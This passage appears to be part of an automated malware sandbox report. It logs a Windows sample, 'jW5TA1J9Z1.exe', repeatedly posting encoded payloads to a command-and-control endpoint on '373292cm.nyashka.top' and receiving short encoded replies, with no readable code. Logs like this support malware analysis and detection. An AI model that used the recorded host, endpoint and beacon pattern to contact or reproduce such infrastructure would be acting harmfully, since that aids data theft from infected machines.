                                                                    Aug 21, 2024 10:03:59.943209887 CEST2544OUTData Raw: 5f 51 59 55 54 48 51 5c 5b 5f 5a 51 59 5e 58 5e 57 50 5d 5b 57 5f 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYUTHQ\[_ZQY^X^WP][W_S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-83?5="#:*- _<=[??7<#!;()<" )Y8&F$.Y/
                                                                    Aug 21, 2024 10:04:00.273324966 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:00.472439051 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    56192.168.2.75301280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:00.617880106 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:00.974745035 CEST2544OUTData Raw: 5f 57 5c 56 51 45 51 5d 5b 5f 5a 51 59 53 58 53 57 5e 5d 52 57 5b 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\VQEQ][_ZQYSXSW^]RW[SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X,U8".4X #!]+=(^+=9\<-'7,7#"0P(9<7^;.&F$.Y/5
                                                                    Aug 21, 2024 10:04:01.289443970 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:01.486655951 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    57192.168.2.75301380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:01.618535042 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:01.974509954 CEST2544OUTData Raw: 5f 55 5c 5e 51 42 54 58 5b 5f 5a 51 59 55 58 51 57 50 5d 5b 57 50 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _U\^QBTX[_ZQYUXQWP][WPSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./U05+#V9>=>=&< "?# "/(_8# /&F$.Y/-
                                                                    Aug 21, 2024 10:04:02.300474882 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:02.435986042 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    58192.168.2.75301480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:02.556639910 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:02.911976099 CEST2544OUTData Raw: 5f 51 59 57 51 44 54 58 5b 5f 5a 51 59 53 58 51 57 5c 5d 5b 57 5a 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYWQDTX[_ZQYSXQW\][WZS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./#36>8^43>)-,]?X*([7X ,S4",P+9#9\8>&F$.Y/5


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    59192.168.2.75301580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:03.105993986 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:03.459116936 CEST1844OUTData Raw: 5f 54 5c 51 54 45 54 5a 5b 5f 5a 51 59 56 58 50 57 5b 5d 5e 57 5f 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\QTETZ[_ZQYVXPW[]^W_SUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,U'5"3"*=3<%\(=( < !18V(9( 0%]/.&F$.Y/!
                                                                    Aug 21, 2024 10:04:03.779587984 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:03.909708023 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0c 2a 26 3e 1f 32 05 2f 0b 27 55 22 57 3e 03 3b 5e 2b 3e 2e 05 30 38 2d 17 25 00 30 55 24 05 0c 02 2b 58 2e 50 32 11 33 1e 2d 0e 2b 5d 0c 13 21 07 37 04 31 03 31 2f 23 01 3e 38 05 16 35 2f 2a 5d 3f 39 35 18 2b 3f 28 5f 2b 07 20 05 3f 29 35 0f 38 38 39 18 3a 23 3a 51 20 2e 2b 52 0d 11 24 55 3f 03 22 0a 2a 10 16 05 21 38 24 07 24 04 2d 0c 26 0b 2e 1d 27 17 20 12 32 31 2a 0f 30 21 0b 56 25 28 36 1c 27 2c 35 50 35 08 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %*&>2/'U"W>;^+>.08-%0U$+X.P23-+]!711/#>85/*]?95+?(_+ ?)5889:#:Q .+R$U?"*!8$$-&.' 21*0!V%(6',5P5#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    60192.168.2.75301680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:03.226885080 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:03.584009886 CEST2544OUTData Raw: 5a 56 5c 53 54 41 54 5d 5b 5f 5a 51 59 50 58 54 57 5e 5d 59 57 50 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZV\STAT][_ZQYPXTW^]YWPSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y8!(\4=>-\?[<=$7?( $W<93_ %_/&F$.Y/
                                                                    Aug 21, 2024 10:04:03.899909019 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:04.029611111 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    61192.168.2.75301780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:04.149897099 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:04.505839109 CEST2544OUTData Raw: 5f 5d 5c 55 54 47 51 5c 5b 5f 5a 51 59 5f 58 54 57 50 5d 5f 57 5e 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\UTGQ\[_ZQY_XTWP]_W^S\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._8'@5['73>*-<<=5]<>+ <!!?:7_# =Y,>&F$.Y/
                                                                    Aug 21, 2024 10:04:04.823180914 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:04.953903913 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    62192.168.2.75301880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:05.087222099 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:05.443208933 CEST2544OUTData Raw: 5a 50 5c 52 54 40 54 5b 5b 5f 5a 51 59 50 58 57 57 50 5d 53 57 59 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\RT@T[[_ZQYPXWWP]SWYS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._.035'#*)>,_<.!]+#4<V4(P()+]" 8>&F$.Y/
                                                                    Aug 21, 2024 10:04:06.081064939 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:06.081118107 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:06.081173897 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    63192.168.2.75301980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:06.212253094 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:06.568507910 CEST2544OUTData Raw: 5a 56 5c 50 51 45 54 5f 5b 5f 5a 51 59 53 58 5f 57 50 5d 5d 57 5f 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZV\PQET_[_ZQYSX_WP]]W_S\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/#507)+.4\?.6)-#7 !"??)#^7%8&F$.Y/5
                                                                    Aug 21, 2024 10:04:07.873039007 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:08.001137018 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    64192.168.2.75302080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:08.135761023 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:08.493469000 CEST2544OUTData Raw: 5a 56 59 57 54 47 54 5b 5b 5f 5a 51 59 5f 58 52 57 5a 5d 5f 57 5d 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYWTGT[[_ZQY_XRWZ]_W]S\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-;$6.; =\)=?+-9+("<,71,S+*$" 5/.&F$.Y/
                                                                    Aug 21, 2024 10:04:08.807909966 CEST25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    65192.168.2.75302280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:08.918359995 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:09.271543980 CEST1844OUTData Raw: 5f 57 5c 5f 54 44 51 5b 5b 5f 5a 51 59 5f 58 5e 57 51 5d 58 57 5b 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\_TDQ[[_ZQY_X^WQ]XW[S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/$!?701Y*#<9\).?X#041 V+)3#6;>&F$.Y/
                                                                    Aug 21, 2024 10:04:09.584654093 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:09.715143919 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 11 2a 36 32 5d 26 02 24 53 33 33 31 0d 2a 2d 09 5b 2a 5b 25 59 33 01 25 1a 26 3d 27 0d 33 02 2e 00 28 00 26 1a 26 01 33 5b 2e 0e 2b 5d 0c 13 21 00 20 39 2a 1e 24 3c 37 05 2a 2b 37 17 35 2c 2a 5a 29 2a 2e 0a 2b 06 24 5f 28 39 23 59 2b 03 3e 1c 2c 06 36 06 39 56 36 57 22 2e 2b 52 0d 11 27 0e 3c 03 22 0f 29 58 3c 06 21 2b 27 59 26 2e 26 51 32 0c 39 0c 27 17 28 1f 31 1c 14 0f 33 0f 35 50 26 15 0f 01 26 3f 26 08 35 08 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &*62]&$S331*-[*[%Y3%&='3.(&&3[.+]! 9*$<7*+75,*Z)*.+$_(9#Y+>,69V6W".+R'<")X<!+'Y&.&Q29'(135P&&?&5#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    66192.168.2.75302380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:09.062583923 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:09.412712097 CEST2544OUTData Raw: 5f 51 5c 5f 54 43 54 50 5b 5f 5a 51 59 51 58 52 57 51 5d 59 57 5d 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _Q\_TCTP[_ZQYQXRWQ]YW]STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;;B"[+4:=4_>.%\(-#X#?< ++*+X" 9Y,&F$.Y/=
                                                                    Aug 21, 2024 10:04:09.736898899 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:09.865410089 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    67192.168.2.75302580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:10.105866909 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:10.458995104 CEST2536OUTData Raw: 5f 5d 5c 54 54 41 54 5c 5b 5f 5a 51 59 57 58 56 57 5d 5d 53 57 5a 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\TTAT\[_ZQYWXVW]]SWZS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-.#?". X 05*=$>..(Z 74"?+)'^#39,&F$.Y/!
                                                                    Aug 21, 2024 10:04:10.792354107 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:10.921400070 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    68192.168.2.75302680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:11.056025028 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:11.411961079 CEST2544OUTData Raw: 5f 51 59 54 54 45 51 5d 5b 5f 5a 51 59 54 58 55 57 50 5d 5a 57 51 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYTTEQ][_ZQYTXUWP]ZWQS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U..03D"##*)-+(=&<<4#4"3+9 &,>&F$.Y/)
                                                                    Aug 21, 2024 10:04:11.719397068 CEST25INHTTP/1.1 100 Continue
